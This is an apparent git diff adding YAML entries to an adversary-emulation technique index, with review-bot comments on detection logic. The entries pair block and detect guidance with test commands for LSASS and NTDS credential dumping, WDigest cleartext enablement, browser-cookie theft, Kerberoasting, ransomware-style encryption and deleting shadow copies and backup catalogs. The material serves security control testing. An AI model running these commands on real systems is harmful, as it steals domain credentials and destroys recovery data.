+ id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ tid: T1003.001
+ tactic: TA0006
+ x_tools:
+ - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+ x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ isv: 1
+- name: Extract browser cookies
+ description: Extract cookie information from the user's browser
+ platforms:
+ - windows
+ guidance:
+ - cmd> SharpChrome.exe cookies
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 95790889-fb7d-42af-a221-3535e4197cde
+ tid: T1555.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/SharpDPAPI
+ x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+ isv: 1
+- name: Volumetric Kerberoasting
+ description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+ platforms:
+ guidance:
+ - cmd> Rubeus.exe kerberoast
+ block:
+ - ''
+ detect:
+ - 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. 
Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+ controls:
+ - SIEM
+ - Identity Threat Protection
+ metadata:
+ id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ tid: T1558.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/Rubeus
+ x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ isv: 1
+- name: Extract NTDS credentials via ntdsutil.exe
+ description: Dump domain hashes for all domain users on the domain controller via ntdsutil.exe, which uses Volume Shadow Services (VSS)
+ platforms:
+ - windows
+ guidance:
+ - CMD> ntdsutil "ac in ntds" "ifm" "cr fu {{ outdirectory }}" q q
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use shadow creation events (Event ID 822) and/or file system related Advanced Audit events (e.g. Event ID 4663) to identify Volume Shadow Service activities.
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible. 
+ - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 08efdcab-54e0-4e06-8f72-b72f23e4fcab
+ tid: T1003.003
+ tactic: TA0006
+ x_vectr_id: 08efdcab-54e0-4e06-8f72-b72f23e4fcab
+ isv: 1
+- name: Enabled WDigest via Registry
+ description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+ platforms:
+ - windows
+ guidance:
+ - cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+ block:
+ - Suspicious Registry modification blocked by endpoint security tool
+ detect:
+ - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ tid: T1112
+ tactic: TA0005
+ x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ isv: 1
+- name: Register Security Service Provider (SSP) in LSASS
+ description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+ platforms:
+ - windows
+ guidance:
+ - shell> {{ ssp_loader }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+ detect:
+ - For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32. 
+ - For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+ tid: T1547.005
+ tactic: TA0006
+ x_references:
+ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+ x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+ isv: 1
+Impact:
+- name: Encrypt a large amount of files
+ description: Encrypt a large amount of files on the endpoint to simulate ransomware
+ platforms:
+ guidance:
+ - cmd> coldcryptor.exe run {{ extension }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Detect common ransomware extensions using file system telemetry
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ tid: T1486
+ tactic: TA0040
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+ x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ isv: 1
+- name: Delete backup catalogs with wbadmin.exe
+ description: Delete native Windows backups
+ platforms:
+ - windows
+ guidance:
+ - CMD> wbadmin delete catalog -quiet
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible. 
+ controls: + - SIEM + - Endpoint Protection + metadata: + id: 99c34e6d-c82a-48b8-88ea-7453f98ee561 + tid: T1490 + tactic: TA0040 + x_vectr_id: 99c34e6d-c82a-48b8-88ea-7453f98ee561 + isv: 1 +- name: Delete shadows with vssadmin.exe + description: Delete volume shadow copies on the host to inhibit file system recovery + platforms: + - windows + guidance: + - CMD> vssadmin.exe delete shadows /all /quiet + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Suspicious Volume Shadow Service use detected in the SIEM using telemetry + controls: + - Endpoint Protection + - SIEM + metadata: + id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4 + tid: T1490 + tactic: TA0040 + x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4 + isv: 1 +- name: Modify group policy object + description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems. 
+ platforms: + guidance: + block: + - '' + detect: + - Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes + controls: + - SIEM + metadata: + id: 45591791-541b-4a27-bda9-75e6d78a66f4 + tid: T1484.001 + tactic: TA0005 + x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4 + isv: 1 +Exfiltration: +- name: Extract data to cloud storage service + description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box + platforms: + guidance: + block: + - Sensitive data sent over the network is blocked by network DLP tool + - Network security tool detects connection to domain based on category from proxy or DNS + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + tid: T1567.002 + tactic: TA0010 + x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + isv: 1 +- name: Extract sensitive data over HTTP + description: Extract data from the network over HTTP tcp/80 to an external host or IP. 
+ platforms: + guidance: + - http://dlptest.com/http-post/ + block: + - Sensitive data sent over the network is blocked by network DLP tool + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + tid: T1048.003 + tactic: TA0010 + x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + isv: 1 +- name: Extract sensitive data over HTTP C2 + description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP + platforms: + guidance: + - implant> download {{ file }} + block: + - Sensitive data sent over the network is blocked by network DLP tool + - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool + detect: + - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + tid: T1041 + tactic: TA0010 + x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + isv: 1 +Collection: +- name: Screen Capture + description: Capture an image of the user's screen + platforms: + guidance: + - "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + controls: + - Endpoint Protection + metadata: + id: 804512cc-4acf-4be3-a577-ce02ea723fab + tid: T1113 + tactic: TA0009 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs + x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab + isv: 1 +- name: Keylogger + description: Log user keystrokes + platforms: + - windows + guidance: + - "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process 
execution/behavior detected by endpoint security tool + controls: + - Endpoint Protection + metadata: + id: be524cb1-12e6-4708-ad57-faf91dfad9de + tid: T1056.001 + tactic: TA0009 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs + x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de + isv: 1 +metadata: + prefix: OTI + bundle: Operational Technology Index 2024 v1.0 diff --git a/ot-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml b/ot-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml new file mode 100644 index 0000000..d274f20 --- /dev/null +++ b/ot-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml @@ -0,0 +1,19 @@ +name: Screen Capture +description: Capture an image of the user's screen +platforms: +guidance: +- "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +controls: +- Endpoint Protection +metadata: + id: 804512cc-4acf-4be3-a577-ce02ea723fab + tid: T1113 + tactic: TA0009 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs + x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab + isv: 1 diff --git a/ot-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml b/ot-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml new file mode 100644 index 0000000..62f850b --- /dev/null +++ b/ot-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml 
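Review bot: `platforms:` is left empty in the Screen Capture file while the sibling Keylogger entry in the same commit declares `- windows`, and the only referenced tool is a C# source (screenshot.cs), so the empty list reads as an omission rather than a deliberate "any platform". If the entry is Windows-only, add `- windows` under `platforms:` so consumers filtering the index by platform get the same answer for both Collection techniques. The generic EDR lines under `block`/`detect` give no technique-specific signal; if the index wants one, screen capture from a non-interactive or unsigned process is the usual behavioral hook, but that is a judgement for the authors.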
@@ -0,0 +1,20 @@
+name: Keylogger
+description: Log user keystrokes
+platforms:
+- windows
+guidance:
+- "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+ id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ tid: T1056.001
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+ x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ isv: 1
diff --git a/ot-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml b/ot-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
new file mode 100644
index 0000000..250d96d
--- /dev/null
+++ b/ot-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
@@ -0,0 +1,20 @@
+name: Access via remote assistance tool
+description: Establish connection to system using a legitimate remote assistance application
+platforms:
+guidance:
+block:
+- Block the installation and use of unapproved third-party utilities via application control software
+- Connections to known remote access service domains/IPs are blocked
+- Remote access connection attempts originating from users outside of the tenant are blocked
+detect:
+- Connections to known remote access service domains/IPs are detected
+controls:
+- Application Control
+- ID/PS
+- Firewall
+metadata:
+ id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ tid: T1219
+ tactic: TA0011
+ x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ isv: 1
diff --git a/ot-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml b/ot-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
new file mode 100644
index 0000000..fa200fe
--- /dev/null
+++ b/ot-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
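Review bot: The `detect` list for the remote assistance entry covers only network indicators (known remote access service domains/IPs), while `block` already leans on endpoint application control; there is no endpoint-side detection, so a tool that reaches an unlisted or self-hosted relay is never seen. Consider adding `- Execution of known remote assistance/remote access binaries (by image name, hash or signer) detected by endpoint security tool or from process create events in the SIEM` and listing `Endpoint Protection` under `controls`. `guidance:` is also empty, so the test is not reproducible across operators; a parameterized hint such as `- shell> {{ remote_assist_tool }}` in the style of the other entries would fix that.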
@@ -0,0 +1,18 @@
+name: HTTP C2 over tcp/80
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ isv: 1
diff --git a/ot-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml b/ot-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
new file mode 100644
index 0000000..075c765
--- /dev/null
+++ b/ot-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
@@ -0,0 +1,18 @@
+name: HTTPS C2 over tcp/443
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ isv: 1
diff --git a/ot-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml b/ot-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
new file mode 100644
index 0000000..ac75a59
--- /dev/null
+++ b/ot-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
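Review bot: For the HTTP C2 entry, `guidance:` is empty, yet the outcome of this test depends almost entirely on which framework and traffic profile the operator uses — a default profile is caught by most ID/PS signatures, a malleable profile mimicking a common web application usually is not — so two teams running "the same" test will score it differently. Suggest a parameterized line such as `- implant> {{ c2_framework }} with profile {{ c2_profile }} beaconing to {{ c2_host }}` and a note that the profile used must be recorded with the result.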
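Review bot: For the HTTPS C2 entry, the `ID/PS` and `Web Gateway` controls can only apply signatures to the payload when TLS is intercepted at the proxy; without inspection, what is actually observable is connection metadata, and the detect line should say so rather than implying the same coverage as the tcp/80 variant. Suggest `- C2 channel is detected by proxy/firewall from TLS metadata (SNI, certificate issuer/age, JA3/JA4 fingerprint, beacon periodicity) or, where TLS inspection is in place, by ID/PS content signatures`. As with the HTTP entry, `guidance:` is empty; the framework/profile used should be parameterized and recorded.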
@@ -0,0 +1,18 @@
+name: Remote tool download over HTTP
+description: Download a tool from a public hosting location onto the victim system
+platforms:
+guidance:
+block:
+- Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+detect:
+- Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ tid: T1105
+ tactic: TA0011
+ x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml b/ot-index-2024/techniques/CredentialAccess/08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml
new file mode 100644
index 0000000..83f653a
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml
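Review bot: Both `block` and `detect` rely solely on signatures for known-malicious tools, so a renamed or repacked binary — which is how this technique is normally executed — scores as undetected even where the web gateway has the telemetry to catch it. Suggest adding `- Download of executable content (PE magic / application/x-msdownload or octet-stream) from an uncategorized or newly seen domain detected in proxy logs` under `detect`, and on the endpoint side a file write carrying a Zone.Identifier (Mark-of-the-Web) by a non-browser process. `guidance:` is empty; the sibling 2023 index had separate certutil and generic download variants, so a `- cmd> {{ download_command }}` placeholder would keep this entry reproducible.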
@@ -0,0 +1,22 @@
+name: Extract NTDS credentials via ntdsutil.exe
+description: Dump domain hashes for all domain users on the domain controller via ntdsutil.exe, which uses Volume Shadow Services (VSS)
+platforms:
+- windows
+guidance:
+- CMD> ntdsutil "ac in ntds" "ifm" "cr fu {{ outdirectory }}" q q
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use shadow creation events (Event ID 822) and/or file system related Advanced Audit events (e.g. Event ID 4663) to identify Volume Shadow Service activities.
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 08efdcab-54e0-4e06-8f72-b72f23e4fcab
+ tid: T1003.003
+ tactic: TA0006
+ x_vectr_id: 08efdcab-54e0-4e06-8f72-b72f23e4fcab
+ isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml b/ot-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
new file mode 100644
index 0000000..12180d9
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
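Review bot: `Use shadow creation events (Event ID 822)` does not correspond to a shadow-copy event I can place; if the intended reference is the VSS "shadow copy created" event in the Application log, that is Event ID 8222 — confirm and correct, since an analyst building a rule from this text will search for the wrong ID. Suggest `- Use shadow creation events (VSS Event ID 8222 in the Application log) and/or ...`. Separately, the `ifm` full-create guidance leaves a copy of NTDS.dit plus the SYSTEM and SECURITY hives in `{{ outdirectory }}` — every domain secret — so the entry should tell operators to securely delete that directory once the test is scored.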
@@ -0,0 +1,21 @@
+name: Dump LSASS memory using builtin comsvcs.dll
+description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+platforms:
+- windows
+guidance:
+- shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+metadata:
+ id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml b/ot-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
new file mode 100644
index 0000000..a27e66e
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
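Review bot: `Enable Credential Guard to prevent traditional process dumping of LSASS` misstates the control: Credential Guard does not stop the comsvcs `MiniDump` call from succeeding, it moves NTLM hashes and Kerberos keys into the isolated LSA process so the resulting dump contains no reusable secrets. The control that actually denies a non-protected process a dump-capable handle to LSASS is LSA Protection (`RunAsPPL`), which this same commit already names in the SSP entry; suggest `- Enable LSA Protection (RunAsPPL) so non-protected processes cannot open LSASS; enable Credential Guard so that any dump that does succeed contains no NTLM hashes or Kerberos keys`. The detect list is only the generic EDR line; the concrete, high-fidelity telemetry for this variant is Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe where the CallTrace contains comsvcs.dll, which is worth stating so the SIEM side is testable.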
@@ -0,0 +1,22 @@
+name: Register Security Service Provider (SSP) in LSASS
+description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+platforms:
+- windows
+guidance:
+- shell> {{ ssp_loader }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+detect:
+- For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+- For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+controls:
+- Endpoint Protection
+metadata:
+ id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+ tid: T1547.005
+ tactic: TA0006
+ x_references:
+ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+ x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+ isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml b/ot-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
new file mode 100644
index 0000000..821fcc8
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
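Review bot: The second detect line (temporary loads via AddSecurityPackage, per the ired.team reference) relies on an EDR baseline of LSASS module loads, but Windows emits a native event for exactly this: Security Event ID 4622 "A security package has been loaded by the Local Security Authority", which names the package, and is enabled through the Audit Security System Extension subcategory. Suggest adding `- Alert on Security Event ID 4622 where the loaded package is not one of the expected built-in SSPs, and on Sysmon Event ID 7 image loads into lsass.exe that are unsigned or carry an unexpected signer`; `controls` should then include `SIEM`, as the other entries do when they cite event IDs. Minor: `basline` is misspelled, and the description reads "Register an SSP DLL that into LSASS". Note also that `tid: T1547.005` is filed under Persistence/Privilege Escalation in ATT&CK while `tactic: TA0006` is Credential Access; if the index deliberately scores it as Credential Access that is defensible, but the pair will not line up in a Navigator layer.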
@@ -0,0 +1,25 @@
+name: Dump LSASS memory using Sysinternals ProcDump
+description: Use ProcDump from Sysinternals to dump LSASS process memory
+platforms:
+- windows
+guidance:
+- CMD> procdump -ma lsass.exe dump
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+- Application Control
+metadata:
+ id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ tid: T1003.001
+ tactic: TA0006
+ x_tools:
+ - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+ x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml b/ot-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
new file mode 100644
index 0000000..cd0d822
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
@@ -0,0 +1,20 @@
+name: Extract Logonpasswords via Nanodump
+description: Use nanodump to extract credentials from LSASS process memory
+platforms:
+- windows
+guidance:
+- cmd> nanodump.exe --duplicate -w {{ out_file }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+metadata:
+ id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ isv: 1
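Review bot: As in the comsvcs entry, `Enable Credential Guard to prevent traditional process dumping of LSASS` overstates what Credential Guard does: `procdump -ma lsass.exe` still produces a dump, it just no longer contains NTLM hashes or Kerberos keys. The control that denies a Microsoft-signed but unprotected tool like ProcDump the handle is LSA Protection (`RunAsPPL`); suggest `- Enable LSA Protection (RunAsPPL) so LSASS cannot be opened by non-PPL processes; enable Credential Guard so a successful dump holds no reusable secrets`. The detect list is only the generic line — Sysmon Event ID 10 (ProcessAccess) on lsass.exe with a GrantedAccess that includes PROCESS_VM_READ (0x10), from an image that is not a known EDR/AV component, is the concrete SIEM telemetry and belongs here since `SIEM` is listed under `controls`.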
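Review bot: In the nanodump entry, `--duplicate` makes the tool reuse an existing LSASS handle found in another process rather than opening LSASS itself (inferred from the flag name and nanodump's documented options — confirm against the README), so a detection keyed on a fresh OpenProcess on lsass.exe from nanodump.exe will not fire; the `detect` list is only the generic EDR line and gives no hint of that. Suggest `- Sysmon Event ID 10 where a non-system process requests PROCESS_DUP_HANDLE (0x40) on several processes in quick succession, followed by a large file write; ProcessAccess to lsass.exe with an unusual CallTrace`. Also worth stating that nanodump writes the dump with an invalidated minidump signature by default (verify against the tool's documentation), so file scanners keyed on the `MDMP` magic will miss `{{ out_file }}`. The Credential Guard wording issue raised on the sibling entries applies here too, and nanodump ships PPL-bypass variants, so the block line should name LSA Protection as the primary hardening with its bypass caveat.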
diff --git a/ot-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml b/ot-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
new file mode 100644
index 0000000..e5b69b7
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
@@ -0,0 +1,22 @@
+name: Extract browser cookies
+description: Extract cookie information from the user's browser
+platforms:
+- windows
+guidance:
+- cmd> SharpChrome.exe cookies
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 95790889-fb7d-42af-a221-3535e4197cde
+ tid: T1555.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/SharpDPAPI
+ x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+ isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml b/ot-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
new file mode 100644
index 0000000..642834a
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
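Review bot: `tid: T1555.003` (Credentials from Web Browsers) covers saved logins, whereas `SharpChrome.exe cookies` steals session cookies, which ATT&CK maps to T1539 Steal Web Session Cookie — the Navigator layer will light up the wrong technique. Suggest `tid: T1539`, or a second entry with `SharpChrome.exe logins` if saved passwords are also meant to be in scope. For detection, SharpChrome reads the profile's `Cookies` SQLite file and unwraps the AES key stored DPAPI-protected in `Local State`, so alongside the file-access line a DPAPI unprotect (CryptUnprotectData) against the browser's key from a non-browser process is the more specific signal, if the EDR exposes it. The `x_tools` link to the SharpDPAPI repository is correct — SharpChrome ships there.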
@@ -0,0 +1,19 @@
+name: Enabled WDigest via Registry
